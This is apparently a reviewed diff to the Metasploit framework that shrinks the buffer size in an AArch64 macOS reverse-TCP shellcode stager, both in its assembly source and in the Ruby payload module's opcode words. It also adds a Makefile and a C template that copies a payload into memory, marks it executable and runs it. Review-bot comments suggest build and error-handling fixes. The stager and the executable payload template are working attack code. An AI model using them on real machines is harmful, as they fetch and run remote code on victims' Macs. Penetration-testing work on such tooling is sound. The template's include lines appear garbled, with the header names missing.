diff --git a/external/source/shellcode/osx/aarch64/stager_sock_reverse.s b/external/source/shellcode/osx/aarch64/stager_sock_reverse.s
index 10739fbbd2..3bc360ff47 100644
--- a/external/source/shellcode/osx/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/osx/aarch64/stager_sock_reverse.s
@@ -20,9 +20,9 @@
 .global _main
 _main:
- /* mmap(addr=0, length=0x1000, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=-1, offset=0) */
+ /* mmap(addr=0, length=328, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=-1, offset=0) */
 mov x0, xzr
- mov x1, #0x1000
+ mov x1, #328
 mov x2, #2
 mov x3, #0x1002
 mvn x4, xzr
@@ -59,10 +59,10 @@ socket:
 svc 0
 //cbnz w0, retry
- /* recvfrom(sockfd='x13', address='x12', length=0x1000, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */
+ /* recvfrom(sockfd='x13', address='x12', length=328, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */
 mov x0, x13
 mov x1, x12
- mov x2, #0x1000
+ mov x2, #328
 mov x3, #0x40
 mov x4, xzr
 mov x5, xzr
@@ -70,9 +70,9 @@ socket:
 svc 0
 //cbnz w0, retry
- /* mprotect(addr, length=0x1000, prot=0x5 (PROT_READ | PROT_EXEC)) */
+ /* mprotect(addr, length=328, prot=0x5 (PROT_READ | PROT_EXEC)) */
 mov x0, x12
- mov x1, #0x1000
+ mov x1, #328
 mov x2, #5
 ldr x16, =SYS_MPROTECT
 svc 0
diff --git a/external/source/shellcode/osx/template/Makefile b/external/source/shellcode/osx/template/Makefile
new file mode 100644
index 0000000000..aabb8e5419
--- /dev/null
+++ b/external/source/shellcode/osx/template/Makefile
@@ -0,0 +1,4 @@
+.PHONY: templates
+templates: template_aarch64_darwin
+ strip $^
+ cp $^ ../../../../../data/$@/$^.bin
diff --git a/external/source/shellcode/osx/template/template_aarch64_darwin.c b/external/source/shellcode/osx/template/template_aarch64_darwin.c
new file mode 100644
index 0000000000..42070807a2
--- /dev/null
+++ b/external/source/shellcode/osx/template/template_aarch64_darwin.c
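Review bot: The new `templates` rule in the Makefile has no compile step of its own, so `template_aarch64_darwin` is produced by make's implicit `%: %.c` rule with whatever `CC` and `CFLAGS` the host defaults to, and the `strip`/`cp` recipe then rewrites that artefact in place; nothing in the file pins the architecture or deployment target of the `.bin` that ends up under `data/templates`. An explicit rule such as `template_aarch64_darwin: template_aarch64_darwin.c` with `$(CC) -arch arm64 -o $@ $<`, plus a `clean` target, would make the output reproducible across hosts. The recipe lines' leading whitespace is not recoverable from this rendering; if they are not tab-indented in the committed file, make will reject them.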
@@ -0,0 +1,18 @@
+#include
+#include
+#include
+#include
+#include
+
+char payload[8000] = "PAYLOAD:";
+int main() {
+ void *ptr = mmap(0, sizeof(payload), PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, -1, 0);
+ if (ptr == MAP_FAILED) {
+ return 0;
+ }
+ memcpy(ptr, payload, sizeof(payload));
+ mprotect(ptr, sizeof(payload), PROT_READ | PROT_EXEC);
+ int (*sc)() = ptr;
+ sc();
+ return 0;
+}
diff --git a/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb b/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb
index 58e9979b7a..87ed79640e 100644
--- a/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb
@@ -45,7 +45,7 @@ module MetasploitModule
 # Generated from external/source/shellcode/osx/aarch64/stager_sock_reverse.s
 # <_main>:
 0xaa1f03e0, # mov x0, xzr
- 0xd2820001, # mov x1, #4096
+ 0xd2802901, # mov x1, #328
 0xd2800042, # mov x2, #2
 0xd2820043, # mov x3, #4098
 0xaa3f03e4, # mvn x4, xzr
@@ -74,14 +74,14 @@ module MetasploitModule
 0xd4000001, # svc #0
 0xaa0d03e0, # mov x0, x13
 0xaa0c03e1, # mov x1, x12
- 0xd2820002, # mov x2, #4096
+ 0xd2802902, # mov x2, #328
 0xd2800803, # mov x3, #64
 0xaa1f03e4, # mov x4, xzr
 0xaa1f03e5, # mov x5, xzr
 0x58000530, # ldr x16, 0x100003f98
 0xd4000001, # svc #0
 0xaa0c03e0, # mov x0, x12
- 0xd2820001, # mov x1, #4096
+ 0xd2802901, # mov x1, #328
 0xd28000a2, # mov x2, #5
 0x580004d0, # ldr x16, 0x100003fa0
 0xd4000001, # svc #0
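Review bot: The `mprotect` call in the new `main` of template_aarch64_darwin.c is not checked, so if the remap to read/execute is refused the buffer is still called while it is only readable/writable and the process dies with a signal rather than reporting the failure; `if (mprotect(ptr, sizeof(payload), PROT_READ | PROT_EXEC) != 0) { return 1; }` mirrors the existing `MAP_FAILED` guard, and returning nonzero on that guard too would stop a failed mapping from looking like success to anything checking the exit status. Assigning `void *ptr` to the function pointer `sc` is a conversion ISO C does not guarantee (POSIX does), and `int (*sc)()` and `int main()` are old-style declarators; `int (*sc)(void)` and `int main(void)` state the intent and keep a pedantic build quiet. The five `#include` directives on this page carry no header names, which looks like the angle-bracketed names being dropped in rendering rather than the committed text, but that is worth confirming against the repository.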